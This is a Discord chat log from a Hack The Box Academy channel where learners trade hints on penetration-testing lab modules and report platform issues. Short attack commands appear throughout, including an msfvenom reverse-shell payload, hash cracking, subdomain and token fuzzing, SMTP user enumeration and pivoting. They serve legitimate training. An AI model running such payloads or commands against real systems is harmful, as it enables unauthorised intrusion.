#modules

Anyone else?

I can't start pwnboxes 😦

Yeah, just got it when trying to spin one up.

just try got the same issue

Here the same for spawn a target.

Same issue overhere

Same. When will this be fixed?

Is there an administrator to report this to?

same here

nobody fed the server hamster

In case anybody is wondering the ovpn file still works

Hello I come to ask for help for my hacked google account to recover it I do not remember the password and I do not know if the hacker who did this changed the email address of the account

Reach out to the support of the respective server/application/website

we cannot help you in recovering your google account

If you didn't know the password I'd suggest it wasn't your account.

But someone tell me i can recovery it with Google support but I understand nothing and I need a tutorial

Start here. https://support.google.com/ This discord isn't the place for it.

I managed to get a new Pwnbox instance

@vital adder @tiny ledge I got the uid of the Admin account. How can I take the token ? (Web Attacks - Skills Assessment)

EDIT: Found token but still getting Access Denied (see: #modules message)

Is it just me, or does anyone else have this happen to them? Just went through a module (password attacks) and did reasonably well & felt confident near the end. Now I'm at the lab part, and I can't even get passed the easy lab, haha. It's like an existential crisis. Clearly, I'm overthinking it or missing something obvious.

The easy lab is harder than the medium lab for that module

Don't sweat it. It happens sometimes

I feel like some of the modules don't always prepare you as well for the assessments. Often times, you don't need to tweak any of the commands they show, in the various sections - copy/paste can lead to a lack of understanding.

Well tbh I feel like it's on you to make sure you understand the sections. You're encouraged to experiment with the tools and commands given all the time.

Sure, but I think there'd be less 'shock' for some people, if the sections made you change some settings, and understand why.

For sure

It's definitely an experience issue (it's all new to me). So when you're suddenly presented with a black box, you feel overwhelmed or unsure of where to start.

All youre experiencing is the feeling that many of us experienced when we attempted our first ctf. You'll figure it out it's just takes time. Also if you wanna dm me for a nudge feel free

I think there were like 3 or 4 modules in the CPTS path that had the first assessment harder than the second.

Windows privesc assessment 1 took me like 3-4 hours. Assessment 2 took me 15 minutes.

Yea

For sure, I'm definitely enjoying the process though.

That's a good thing

Ty

Hey guys

About to start htb as a beginner

Any advice?

Web Attacks - Skills Assessment I have found the uid and the token of the admin user but still can't change the password. Can anyone help me? Or DM anyone?

I’m having trouble with Tryhackme and the rooms. A couple of days ago I entered into a room and after I was finished, I close down my computer when I turned my computer back on on my progress was at zero it is not showing my progress on the dashboard interface so I would try to go into the exact room. I was working in and it was saying that I am already a part of this group. It is not letting me finish the work that I was working on in that particular group. I am confused on what’s going on I try to change my browser. I tried to resetting my computer I tried clearing the catche but nothing is working. Does anybody have any clue what’s going on here ?thank you.

Hi, you my want to join THM discord server.

I just checked and you're not there.

This is the HackTheBox discord

Im a bit stuck on PIVOTING, TUNNELING, AND PORT FORWARDING - Web Server Pivoting with Rpivot
struggeling to proxychains firefox-esr 172.16.5.135:80, proxychains is working with nmap and i can see that 172.16.5.135:80 is alive and running. just can't get firefox to use proxychain. I don't know if i am missing something. any guidance will be much appriciated.

you can try just regular firefox

proxychains firefox 172.16.5.135:80

Do you have your proxychains conf set up correctly?

jip proxychain.conf was the first place that i looked at and it is setup correctly

What exactly is the issue? Can you send a screenshot?

Attacking Common Services : SQL

Having trouble cracking the mssqlsvc with hashcat ... ive run

$ echo "mssqlsvc::XXX-##:XX^0x32:<...>:<..>" > mssqlsvc_hash.txt && hashcat -a 0 -m 5600 mssqlsvc_hash.txt pws.list -o mssqlsvc_cracked.txt -O

But recover no digest (edited)
Jump

kali seems to have proxychains4.conf as its default

Probably better to use something like foxyproxy, rather than trying to pipe all of firefox through proxychains.

Yes lol I don’t know why I keep getting this discord confused 🤣

Try the full hash and you can try rock list

Youre probably right, however you can do it with proxychains (thats how the example shows it)

Hi, having an issue with Shells & Payloads -> Live Engagement

Just need a hint on "Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)"

I know how to implement the payload, how to listen etc. But i'm just needing a hint on what payload i should really be using - i'm not really getting it

this is the payload im making ||msfvenom -p windows/patchupmeterpreter/reverse_tcp LHOST=172.16.1.5 LPORT=8080 -f war > red.war||

did u guys ever attend CTF (Capture the flag) competition hacking

hmm?

oof, don't think i'm good enough for that myself, but i know a lot of people who have !

once dm's bro

@hollow frigate Are u still stuck

@fresh reef Are u still stuck

Hi,

I am doing INFORMATION GATHERING - WEB EDITION - Viritual Hosts

I passed this command: ffuf -w dns-Jhaddix.txt -u http://10.129.209.193 -H "HOST: FUZZ.inlanefreight.htb" -fs 612

The thing is, verbose output is so huge and fast and I can't see anything, is there option to only output found subdomains in console?

could you output it to a file? that might help if you can

I can try, Idk if it will output all scanned subdomains, instead of found ones

hi crean, yes i am still stuck on this

Still need help on this whenever someone can help ^^

@hollow frigate dm

If its outputting everything you need to modify your filter. Take a look at the output. There should be a column called size. What number is in that column for most of the directories it finds? Change the number after -fs in your command to that number

Again you, saving me. Thanks a lot mate. That worked haha! 🙂

Still need help with this ^. Anyone??

Np

Hey, one more question. I got

ap [Status: 200, Size: 102, Words: 3, Lines: 6, Duration: 83ms]
app [Status: 200, Size: 103, Words: 3, Lines: 6, Duration: 62ms]

Is this found subdomains or it isnt filtered bcs I set -fs 10918 so those 2 passed? Because, I tried to go on browser and visit ap.inlanefreight.htb but it doesnt work

And I need to submit flag.

Those are subdomains. You'll need to add them to your /etc/hosts file before you can access them

I already did. I found solution. ||curl command|| mentioned in module. THanks

If you can Curl them you should also be able to access them in your browser

All Curl is doing is making a web request. If the request goes through in your terminal it should go through in your browser

I tried. Doesn't work. So weird.. I even used http instead of https

Hmm. I don't remember that module so well off hand 🤷‍♂️

can anyone explain what sed commands are? I'm on the Service Login skills assessment and seen a few hints regarding the use of sed commands to reduce the wordlist

@rustic sage

Thanks! Not sure how i can apply this to the brute force, but oh well!

What do you want to do with Sed?

nevermind it just cracked after 40 minutes 😄

i do love hack the box

i find it so addictive, worse than videogames

are you still stuck?

I am ^^;

Can someone help me with the file inclusion assessment, I've found the logs and everything, idk where to put my payload. I'm not looking for cryptic hints just help me with the process, I'm %97.67 my cbbh and just want to have it done so I can stop worrying about it. SOLVED! somehow I found it by the skin of my fore. I will be taking screenshots step by step for anyone that needs help in the future, just send a message.

who can help me with the first question in Interactive Section

from HTB academy

it is what the first name of the module for sectios

sections

usually, you are the one who can help yourself

why

read the names of the sections what is the first.
the section list is in the right top.

Can someone help me on NoSQL introduction ; Skills assessment 2?
It seems it’s JavaScript Injection either on login or reset but after trying multiple payloads I’ve still got nothing.

well for starters Ive nearly completed the whole cpts course and I have no idea what youre asking.

done

thank you

Its from "Intro to Academy" the First module the tutorial the first question

the questions is too hard

HHH

Ah gotcha

doesnt sound like something anyone can help with without giving the answer

i cant upload the screenshot. why

cause you havnt verified your account yet

who?

i don't find any verification

you would if you read server rules and introductions better

#welcome

how to do the step 3

Step 3: Go to #bot-commands and type ++identify (ACCOUNT_IDENTIFIER)

Go to the channel bot-commands and type ++identify(ACCOUNT_IDENTIFIER)

you trolling?

Nope

I'm new here

how old are you?

guess

8

it is very easy when you just read

That's a spoiler.

this is not a verry big spoiler

Not even insulting thats my genuine guess at the moment, which if is the case might want to consider waiting a few more years before trying to dive into this topic. Difficulty following basic instructions is going to make the actual content very very difficult to learn.

its literally the answer

thats the most spoilery you can spoil lol

Isnt that a tier 0 module tho?

Only tier 1 and up is treated as live content

I was struggling on that one so am grateful for it.

lol

how old are you Mr old man

this from the tutorial Module. yes it is a spoiler but its the TUTORIAL for a nother module i dont do that

ngl i feel like your probably right about in the 9 - 12 range

12

I think you called it with the troll @thorn urchin - I'm so bad at seeing them.

Ive seen my large share of trolls over my time. Its just pattern recognition

^

can any one help me with the subnetting section of the networking module?

Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer.

The brute force module is poorly written 😄 DM me anyone if you need a hand

in fact Ill go one step further and bet its the same person behind LightningDev

Similar style and account creation times line up

Hhhhhhhhh I'm older than you

👍

can i call u grandpa?

no I'm not that older

uncle then?

no I'm still 18-

hello

Hey

whats up

how ya doin

Doing good, how you doin

great.

how long have you been hacking?

What module is this about?

About a year on and off

nice.

Hes right though

Youre in the academy section, this is for discussing academy modules. Verify your account on #welcome and then go to general if you wanna just chat

Really sorry again for reposting this

I do want to get it done today so I can get some more knowledge under my belt ^^;

I didn't make a payload for that one, I just used one of the ones in msfconsole until it worked.

A normal exploit?

Your confidence suggests I may be miss-remembering lol - but I think so yeah

I'm only saying because the attack vector I found was ||a file upload on the server manager||

Is this for host 3?

1

Host 3 was...uhhh

Yes an exploit

dw about me, I'm talking about completely the wrong module.

Ohhh okay

no, wait. we are talking about the same one. So you cannot get the ||upload|| exploit to work?

Nope

Although I'm certain it's my fault

I'm not sure where I'm going wrong

but I didn't use msfconsole. That was my mistake. Do you want to DM me, where you got to?

Ay please thank you !

lmk if u get stuck

i just did that a couple of hours ago

is that the 2nd qus?

yes

still crying, still seething, still coping

Hi, im currently stuck on Footprinting imap is their anyone who can give me a hint?

Anybody know any exploits for Konichiwa 1.1

What is the issue you're having ? Be a bit more detailed

i have to input the organisation name i feel like i found it but it is not correct

Ah

DM me what the org you think it is

Hello, I am stuck at "Footprinting Lab - Medium". I found the|| sa creds but can't log in with them to MSSQL||. I also saw a hint in upper commends about ||reviewing other applications in windows||, but I was still stuck with the machine. Can I get help, please?

May I DM you the hint? As it can be a spoiler

Of course

where's the general chat?

#general , you need to verify your HTB account in #bot-commands to see it

I keep getting an error

There should be a green chat bubble at the bottom right in the htb page to contact support

Hi.. module: ZAP Fuzzer.. trying to grab a request to the web .ip../skills/ to get a cookie as a guest user and i have a cookie in respones.. I am missing something.. where should I correct it?

can someone help me with this challenge
Predictable Reset Token - Broken Authentication
https://academy.hackthebox.com/module/80/section/779

• i converted time, date to epoch milliseconds
• generated wordlist numbers.txt
  $ for i in $(seq <epoch +10,000> <epoch -1000>); do echo $i >> numbers.txt; done
  $ wfuzz -v -c -t 100 -z file,numbers.txt,md5 -u "WEBSITE" -X POST -d "token=FUZZ&submit=check" --hl 54

not getting results

I had the same issue. What i was doing wrong was to not set de LHOST. It was automatically set for my local IP, so I hado to set it for the vpn IP

Can anyone point me in the right direction for the Attacking GitLab username question? The script on exploit-db didn't work for me so I wrote me own, it finds the usernames in the example so it works but what username list do I need to use? I tried all in the seclist usernames folder except the xato lists as the box timeout before it finishes the list.

can someone help me in community-help

Hello everyone. I am stuck at taking notes. I dont want to start another module before finishing note taking part. Would anybody like to share notes with me for any of the following modules? ( Cracking Passwords with Hashcat, File Transfers, Password Attacks, File Inclusion, Using Web Proxies)

Everyone takes notes differetly. You need to find waht works for you

Honestly taking notes yourself is nearly half the point of even doing modules

yeah you are right. I am bored with it and going crazy though. hahahaha

my notes have noticeably improved from when I started to where I am now

Considering redoing some of the earlier modules even

If you want to see some different formats to get a feel for some of the ways other people take notes, heres an example from part of the AD module from my notes

It looks great

what are you using

For exercises and labs i make use of the canvas feature in obsidian like this

Obsidian

I am just mesmerized by the blue color. I am using notion.so

Ah

I used notion for a little bit. But i like obsidian a lot more

I love your Obsidian layout. I need to sit down and work out how to get the layout like that

(And you can export notion pages into markdown files so if you switch to obsidian you can just export all your notes and put them) directly into an obsidian vault

how tf can you add color to Obsidian??

Thanks. Took me a bit to find a format I like but yea

You mean all the blue? Those are just code snippits. The theme im using turns them blue

gonna try that thnx

Does the theme to the break lines too?

yea lol

I love this theme

I'd like to make my own custom theme at some point. It's on my list of things to do lol

What is it?

Also, are you pulling notes directly into the Canvas?

and your graph is also from the theme?

Depends. If I find that im just copy pasting things right out of a different page then yea, i embed that page in the canvas. Otherwise I use screenshots or I add text

Nope. Thats just obsidian canvas

i got a million dots for my graph 🤣

Thats the mindmap. Canvas is different

Purple Tux - Senior Obsidian expert; AMA 😂

jesus christ i didn't even know about canvas

lmao

I like how you can make those tabs… I have been using Joplin, but it doesn’t let me tab like that

I just accidentally found a feature i didnt know about lol

If you ALT+Click somewhere in your notes you can write in 2 different places at once

may i know how to get help pro APTLabs? at least the skills/courses. i am alrady OSCP certified

Can anyone point me in the right direction? doing ZAP Fuzzer module and my request with ip=/skills/ does not give me a cookie.. only I have cookie in response..

#prolabs-aptlabs

#prolabs-aptlabs

People use Dante for OSCP prep and the difficulty scale goes Dante, Offshore, Rasta Labs, Cybernetics, APTLabs.

So I presume it's quite tough.

Thank you for that theme, I love it. The only thing that bugs me a little is that links look like typos -- but by far the best one I've tried.

Yea. Youll get used to it. Everything else about is great

Yo i need help !

hello guys

this is game?

Many people here will be happy to help as soon as you figure out how to ask a question

I try to do a machine in htb

It's name is ... Soccer

wrong channel. Go to #boxes to ask for help with HTB machines

Thanks buddy

hi anyone that completes the AD Enumeration and Attack module that could help me with the assessment 2

Ill probably be up to that at some point tommorow

can anyone give me a nudge on what wordlist to use for the Attacking LSASS?

if u are in zsh use stty raw -echo;fg in one line

Yea I was using two different lines—I think thats what messed me up.. not sure.
Ill re-do it again tonight—thank you

Can someone please explain the difference between mounting an NFS share as root vs mounting it with sudo? I don't want to spoil any exercise but mounting the share as root (sudo su) let me browse the important directory in a share, while mounting using sudo I couldn't enter said directory

Hmm.. I wonder if the sudo conf for your machine makes it so that using sudo, as opposed to changing to root using su, your real user ID is not the same as your effective user ID

It could be messing up with the NFS share permissions when you're mounting it

Maybe try running ./touch test using both methods and seeing who owns the file?

in the share? it's non-writeable

Yeah right ok, then root_squash option is set I guess. So what I said earlier probably isn't the case

That's interesting though haha, let me know if you get the answer

Just explore the NFS as root

¯_(ツ)_/¯

What linux is best

Or preferred for this system

wrong section to be asking as this can be asked in #1024429874246590575

There's really no "best" as you can download and run any/most tools on any/most distros

Hi, doing the introduction to windows command line module and get stuck on the last question

yes, but why does it work is my question

is it intended?

will do

Probably intended

that's not helpful

Linux privesc module talks about it in detail

The exact mechanisms behind it might be on some Linux forum or in man pages regarding NFS shares and configs

so does the module I believe theyre currently on

guys

@sick fulcrum

help plz

@astral elm

@drifting knoll

i need help

@sharp cove

@west rampart

@vital adder

! AQUA 🔱 got the boot!

hahaha! what was he thinking?!

could it be related to this: https://www.linuxquestions.org/questions/linux-networking-3/root-denied-permission-to-nfs-mounted-directory-but-user-can-read-and-write-4175574268/

Didn't find anything

Yes! The answer to the question in the link that's provided there mentions that the root user is mapped to nobody

And on the NFS share, only nobody could read

Thank you!

@warm lichen ^

This is mentioned in greater detail as a privesc method using NFS on Linux 🙂

Is anyone around who could help me with a nudge on the password attacks - medium lab? I've gotten a decent way into it, but now I've hit a wall, and I feel like I've exhausted all my options... Open to DM.

DM

Hmm.. that's sort of what I meant when I said the no_root_squash option wasn't set. For security reasons NFS mounted shares, even mounted by root, will be squashed to the nobody user/group so that you can't just mount an NFS and be root in that system.

I don't get why using sudo and switching to root with su will make that interaction different though?

Like you'd still be root in either case, which should put you in the nobody user / group

doing stupid shit like that will get ya the boot haha

Imagine joining a server and not reading rules

Thank you, will take an extra good look at that to confirm then

Sudo doesn't make you root

Sudo says: root says I can do this

Solved, thank you.

Yeah I know, but if you run sudo id for example it will give you the ID of the root user. So any service / program you run with sudo will be running as the root user.

I could be wrong here, but wouldn't that mean mounting an NFS share with sudo means you're mounting it as root anyway?

Is what is happening because you're creating the share as the root user, but can't write to it without being root?

^

Lol

Yes that will do it

Sudo in Linux is the same as the runas command in Windows

Or at least similar

I think I'm going crazy, I'm forced into doing windows fundamentals and I'm on the Skills assessment section

everything has been pretty straight forward except for this question:

List the SID associated with the HR security group you created.

I've looked through the entire course and can't see anything that talks about what a security group is and/or how to make one.

https://en.m.wikipedia.org/wiki/Security_Identifier

Yes, I mostly understand SID's but I don't understand how to make a security group

It looks like it asked you to create a group and assign it permissions

1. Creating a shared folder called Company Data
2. Creating a subfolder called HR inside of the Company Data folder
3. Creating a user called Jim

    Uncheck: User must change password at logon

4. Creating a security group called HR
5. Adding Jim to the HR security group
6. Adding the HR security group to the shared Company Data folder and NTFS permissions list

    Remove the default group that is present
    Share Permissions: Allow Change & Read
    Disable Inheritance before issuing specific NTFS permissions
    NTFS permissions: Modify, Read & Execute, List folder contents, Read, Write

It first asks me to make folder

then subfolder

then a user

then randomly jumps to making a security group

@fathom pendant

Hmm it has to be in the module somewhere

~~ smh well I found it tucked away my bad ~~

thanks for the help

hopefully I can actually do it now

nope, it's quite literally not in the module

When I run sudo -l it shows, ALL:ALL NOPASSWD /usr/bin/php That means I can run php as root correct?

I'm stuck a bit beyond (the post/session part). what i did:
1- Used nmap to find the open ports
2- Used curl to get the html
3- Inspected de html to figure out the application (it is one word, no need of the version)

I tried to look for "post" not "exploit". like: "$ grep sudo search post"

hello in the dns enumeration my hint is to change the wordlist to find the fqdn of xxx.xxx.xxx.203. I have tried every list in the DNS enumeration and dont have a .203 . Is there a better folder than enumeration?

Yes

Module: USING THE METASPLOIT FRAMEWORK
Section: Sessions & Jobs
Third question: "...old version of Sudo running..."
After getting the meterpreter on target machine, i found the module: "post/multi/manage/sudo". I put the session of the meterpreter, but it ask for a shell, not a meterpreter. Can anyone help me with a hint? If thats the way or I'm in the wrong path...

There is an outside resource about getting out of bins ;) @sly tapir (it's given in the module)

Yea im looking at GTFObins rn

There is no flag here. Get back to hacking!

:D I keep it bookmarked

hello in the dns enumeration my hint is to change the wordlist to find the fqdn of xxx.xxx.xxx.203. I have tried every list in the DNS enumeration and dont have a .203 . Is there a better folder than enumeration?

oh lol it blocked my paste of the output of the scan

Update:
I tryed to change the payload for a shell reverse_tcp. worked, but could not try the post (time ran out).
trying it tomorrow

That is not the correct module

You may want to start but running the command sudo --version to get the sudo version for that machine and starting your research from there

i have a problem and a question about htb academy pwnbox

I keep getting this timeout errors but have no idea whats causing it

@graceful rampart Can i have assistance with dns enumeration: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

ive tried all the word list in that folder and the usr/share/ folder

it finds three records then stops

Please dont ping me unless youre replying to one of my messages. On top of that, instead of just saying "Can I have help with x" which now requires me to ask you for more information, its always a good idea to provide as much information as possible from the getgo. That way, If someone else knows the answer they can respond as well

Lemme check my notes for that one

K, so i dont have notes on that section, but iirc this hint is what you need: "Remember, you can have subdomains of subdomains"

ok thank you!

Are you available?

Has anyone had trouble getting the provided powershell reverse shell code in Shells & Payloads module working? I entered the correct tun0 address and port, but I keep getting an ExpectedExpression error code. I have tried restarting multiple times, using both the provided attack box and my own host to no avail

Also you'll need to try a few different lists, I'd try the smaller lists first

@fathom pendant i have tried all in that folder and in the /usr/share

i guess my question is do i need to look for another parent folder

But as stated by tux, subdomains of subdomains. It's in Seclist DNS

But as far as which DNS enumeration list it is, that is the patience part

There is no flag here. Get back to hacking!

Please use the correct channel for #bot-commands

Module: AD Enumeration & Attack Skill Lab 2
I’m trying to run Snaffler in MS01, but the 32 bit compiled exe in previous lab doesn’t work . I tried to compile it myself through MS studio but it forced me to upgrade from .NET 4.5 to 4.8 Anyone know how to compile 64 bit Snaffler with .Net 4.7?

Bad gateway error

worked as a charm!
thx!

Yes i am @.@

Sorry i was at my current gig (looking forward to seeing what a CPTS opens up for me). That being said ...still trying to figure out cracking this hash for the plain text pass like a noob lol

Need a nudge on the "Attacking Child -> Parent" domain trusts from linux section of AD Attacks and enumeration. I cannot for the life of me figure out how to get this hash. I have the Golden Ticket. Dont wanna spoil anything here so if youve done this section please let me know so we can discuss in DM's

Solved

that Getting Started module was quite fun

Make sure you look for a ||”fierce”|| wordlist in Seclits

guys is HTB academy down?

noo?

well i am getting a connection timed out

for anything HTB related ... other sites load fine

how to hash every line in txt file to md5

something on your end it seems

Hello there, I am currently doing module Footprinting, and I am stuck ing the SMTP question

Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

While googling it said i came across I should use the command

||nmap -sV --script smtb-enum-users hostname -p25||

But when I use the command i get I do not have the correct script or script not avaliable,

I am just wondering if I am on the right path or is it something else 😛

smtb != smtp

Thank you

Hey there, I am trying to do the Public Exploits section of the Getting Started module. However the target IP they have given me contains a port, I am unable to ping to it with that port included or removed. I have tried restarting it numerous times as well

You cannot ping a docker target, if that's the case

not sure if it is just me but I'd had so many stability issues completing the exercises throughout the academy. Frequent VPN disconnects, instances having to be restarting several times until they're resolvable, etc. Makes the whole experience take about 10 times longer than it should

find a way to grab the banner, using netcat, telnet or else

reach out to support

unable to telnet or nc to the target

maybe your syntax is wrong

So the target is 165.22.115.189:32439

I am doing nc 165.22.115.189:32439

and telnet 165.22.115.189:32439

thats not how it works

check the manuals of the tools

check with a F ing browser 🤣

or that

also you can't scan docker container so don't even don't even bother

and the next question is how can you ping a port

i didnt

i did ping 165.22.115.189

you can't do that either you only have access to that one give port not the ip or any other port

let's think hypothetically, that IP is responsible for many services

i didnt realize that

ty

SMTP, SMB, FTP and HTTP, HTTPS and so on

how can we differentiate those services

the port

Okay, so far so good, the next thing is how can you understand what is running on which port

when they are not using the default ones

e.g. http is not running on port 80 or 443 respectively https

but on others that are random

banner grabbing

bingo, do it now

one of the examples u gave was nc right?

im getting a timeout when trying nc -nv 165.22.115.189 32439

yes, it can tell you if the port is open or not, doesn't necessary require to have a banner if its not configured

created a new target and now getting connection refused

Is anyone available for a hint for AD Enumeration & Attacks - Skills Assessment Part II question 4- I’ve enumerated the domain finding all the users but lost on how to get the username and password from here on..I have also tried to spray from evil-winrm on the previous found credentials but gets stuck. Also have attempted on the pwnbox but unable to transfer tools from it when logged into the htb-user ssh session to the evil-winrm session. I have been stuck on this for days.

ok got everything sorted, i had to restart my vm and get a new target

now the webpage loads

and im able to netcat

Can someone please give me a nudge with the medium footprinting lab? I have RDP access since yesterday as alex but haven't been able to advance

I looked through all the directories couldn't find anything related to sa credentials, so I have no idea how to access the database

enumerate and look carefully again

there is a specific thing that stands out

🔥

Still need help with this ^. Anyone??

Ran a full nmap scan, checked the share, and the important file again, I don't see anything strange :/

dammit dammit

never mind, didn't look thoroughly enough

ahh medium footprinting is a tricky bastard hahah

that was fun

What's the question?

So in Footprinting - SMPT, for question

" Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer. "

I used a Python code that would VRFY all the names in footprint-wordlist.

I found the flag, but there has to be a better way or a easier command. Would somebody be kind enough to explain the command to me

@devout torrent DM

Does any use the commix tool for command injection? I don't notice it talked about a lot, but it seems to be a popular project on github. https://github.com/commixproject/commix

question: I have made an SSH socks5 tunnel to a foothold. can I now add the localmachine and port to foxyproxy to use firefox ?

Can anyone shed some light on the file uploads module skill assessment

yes i can 😄

I might be able to, i have it solved but i didn't take notes like a noodle.

Hey Guys, Im stuck at "AD Enumeration & Attacks - Skill Assessment Part I" => Crack the account's password. Submit the cleartext value (svc_sql).

I tried to use some LotL Methods but nothings works, so i want to upload PowerView oder Mimikatz for Kerberosting

So i am able to upload PowerView.ps1 but cant find it in the Windows

some hints here?

You used an IEX download cradle. Meaning that the powershell script isn't saved to disk but rather loaded directly into memory. I'm not sure if that will work for importing a ps module. Altho, if it does, you should just be able to run powerview commands

I don't see support chat on academy platform..

I would like someone to verify my university email

Click on icon in the bottom right

no send message option

Call. Snoofing best tool for kali??

Support is on the main platform

Caller spoofing? Like for phones? Falls outside of scope of most things and isn't taught on this platform

Ya caller snoofing

Tool name??

Not taught here.

This is the wrong channel for your question as well.

thats incorrect

Is there an academy support button?

of course there is

Oh. Well consider me wrong then

I see the same thing on main

can't send a message

It also seems you're on mobile

i'm not

Oh is this a screenshot

@mortal surge choose an article and pick the sad face at the bottom

once done you will be prompted to send a message

Yeh do that!

tried that

😦

I managed to send an email.
Hopefully...

I've seen issues with not seeing the support options due to some adblocker settings

Hello all, I am having trouble in the skills assessment for Intro to Windows Command Line Module. Any help would be appreciated

@scarlet shore <@&861185840277487616>

thanks!

dammit, I always miss the good stuff lol

@stuck hull how

Saaaame 😦

We all miss the good stuff

it wasn't that good. Some fool telling people how he can help you make big cash with crypto scams

Ah

Classic

hey! i can`t accses internet in linux wifi connected but internet not working ping not working i try etc/resove.conf nameserver 8.8.8.8 but problem not solve

Anyone on this one, please? 😄

nope

jk shoot me a dm

can someone tell me about

this problem

Anyone else having problems victim machine ip:port resetting connection/not connecting?

i just try with target in Web Attacks - Skills Assessment and it seem to be working fine

which module are you on?

Brute Forcing Skills Assessment

if it is still not connecting for you give me a sec i'll send you my target for a sanity check

which one 🤣

I get this no matter how many times I refresh the target

quick one is your burp proxy on?

Oh srry the second

no everything works except academy victims

wait the F ing target said the port is ssh

but the description says I need to get names and info from their website..

oh it's from the previous skill assessment

loool

really

cuz the description makes it sound like a new target

to be clear im at the service login brute force skills assessment

yep you will need to use some info you got from "their website" the previous Website skills assessment

Gotcha, good thing I make screenshots

Hi, I'm stuck on "Footprinting Lab - Hard". I found the ||SNMP||, and I tried ||snmpwalk, onesixtyone, and braa||. ||Snmpwalk gave me Timeout: No Response and braa didn't worked. I received the OS version with onesixtyone, but I don't know what t do with that.|| Should I stick attacking to that protocol :S ?

you're on the right track, remember to look back at your notes from the module!

But the tools that I mentioned didn't work :S

Have you found the community string?

That string should be in the output of the onesixtyone command.

No, the tools that I mention gave errors like ||Timeout: No Response from ||

||" I received the OS version with onesixtyone"||

If that doesn't work anymore, check your host and connection to that host from the pwnbox/vpn

Can someone help me on the broken authentication brute forcing cookies and maybe predictable reset tokens? I'm pretty sure i figured out the correct encoding for question two in brute forcing cookies but idk the cookie i used wasn't correct i guess?

hello if someone is interrested to become my friend pleas go to dm and we gonna learn together like all topics in programming

Blind SQL Injection module is up and available for koobs

Hey there, running through the Linux Fundamentals, and stuck on Working with Web Services. I am struggling to start the web server on port 8080, when I go and try to change the listen port, it doesn't seem to do anything, so I think I am just lost

you need to add something as in mentioned in the question

if the port 8080 is giving you an error then there is a possibility it actually works at the background

check 8081 to see if it works

so 8081 works

meant to reply, my b, 8081 is working here is example of what i see

hi, am trying to understand where am i wrong in this question, am currently trying to impersonate,but it doesn't allow with htbdbuser. I either try msfconsole msql_login for sa through Resources section users.list and pws.list but still nothing 😐

Today i have a strange thing in the "Getting started" Module, Service Scanning.
The Quastion is:
'Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080?'

i use 'nmap -sV -p 8080 10.129.42.254'

the result is
'PORT STATE SERVICE VERSION
8080/tcp open http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[the footprint is to long i haven't netro];'

block a proxy the scan?

Try using the -sC flag

Along with your current command

I did this section last night and found that I was able to get the correct answer with it

so just change the port number and enter it like that looks like 8081 is working

wait it still scanning

how can i specify the port in the argument? I feel like I'm doing too much to change the port over

give it a way to make nmap faster (more threads)

-p 8081 instead of 8080 i think they saying

i get more information's whit -sC port 8081 not found

yep. you can also search on google like "how to use npm"

word, that should get me in the right direction, thanks man! Really appreciate this community not spoon feeding

this information i get more
`| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 757
| Date: Tue, 10 Jan 2023 18:36:55 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 404
| Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
| Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /nice%20ports%2C/Tri%6Eity.txt%2ebak</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.31 (Ubuntu)</h3></
| HTTPOptions:
| HTTP/1.1 200
| Allow: OPTIONS, GET, HEAD, POST
| Content-Length: 0
| Date: Tue, 10 Jan 2023 18:36:50 GMT
|_ Connection: close
´

you doing better then me lol. i cant even fix annoying warning i get after i screwed something up haha "Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)).
thinking ill put that issue in the deal with later pile with all the rest haha

🤦‍♂️ figured it out lol I see what i did wrong

yep

it was literally that SIMPLE

hahaha

Anyone for a nudge on AD skills Assesment 1? Trying to find the cleartext password fo the second user but I cant figure out hwere to find it. Im probably overlooking something stupid I was Indeed overlooking something. Found it

can you explain how i put that issue in the deal with later pile?

no im putting my warning issue in the deal with later pile with all my other issues so i can go back to getting through the modules and hopefully learn how to fix my always growing bunch of too hard pile issues i need to get around to

For anyone who hasn’t seen … the academy has posted a template example pentesting report which I thought could be useful for the people here

https://www.linkedin.com/posts/hackthebox_htb-penentration-testing-report-template-activity-7018599052455911427-v0VS?utm_source=share&utm_medium=member_ios

Hope not breaking any rules here

ok

Well, thats AD Skills Assesment 1 Complete. Watching all the hashes pour in at the end is great feeling lol

Hello

Im stuck at the service scanning from the pentesting basics section

I have to scan a SMB service to see which user are on the user disk but when i run the command i got an error
smbclient -N -L \\10.129.42.253
smbclient \\10.129.42.253\users

i found the error Kali Linux i don't know why but Pwnbox woks
have i a issue whit my Kali Linux installation or is it the VPN Connection ?

What error?

i found the issue

next time I'll put my glasses

😂

Well played

i think HTB want that i spend money for Penbox

It's not needed unless your machine cannot support a virtual machine

i use kali linux in VM (windows is host) use Virtualbox connect to the vpn

I've never used pwnbox aside from troubleshooting some small issues. 99% of the time I use my own machine

I used pwnbox heavily in the first half of the course and then switched to mostly my own for the second half.

In the first half I had a lot more opportunities to grind stuff out at work which is why. Things been too busy to study at work now though

module: SHELLS & PAYLOADS
page: 16 (The Live Engagement)
**problem: ** I dont know which shell i can use
(i know that it need to use .war, but i dont know where i can find it)

I foud something in ||/usr/share/webshells/laudanum/jsp/cmd.war|| but it doenst work

ATTACKING ENTERPRISE NETWORKS // Post-Exploitation
Am i the only person for whom the double pivot with msfconsole doesn't work. The first reverse shell does work but something is going wrong with the dc_shell.exe

could try something other than msfconsole

module is kinda meant to be tackled in your own way blind first and rely on the sections if you need help. So you can use other pivot tools if one doesnt seem to work well for you

generate a shell using the war file extension/file type

can you be more specific? how

using msfvenom

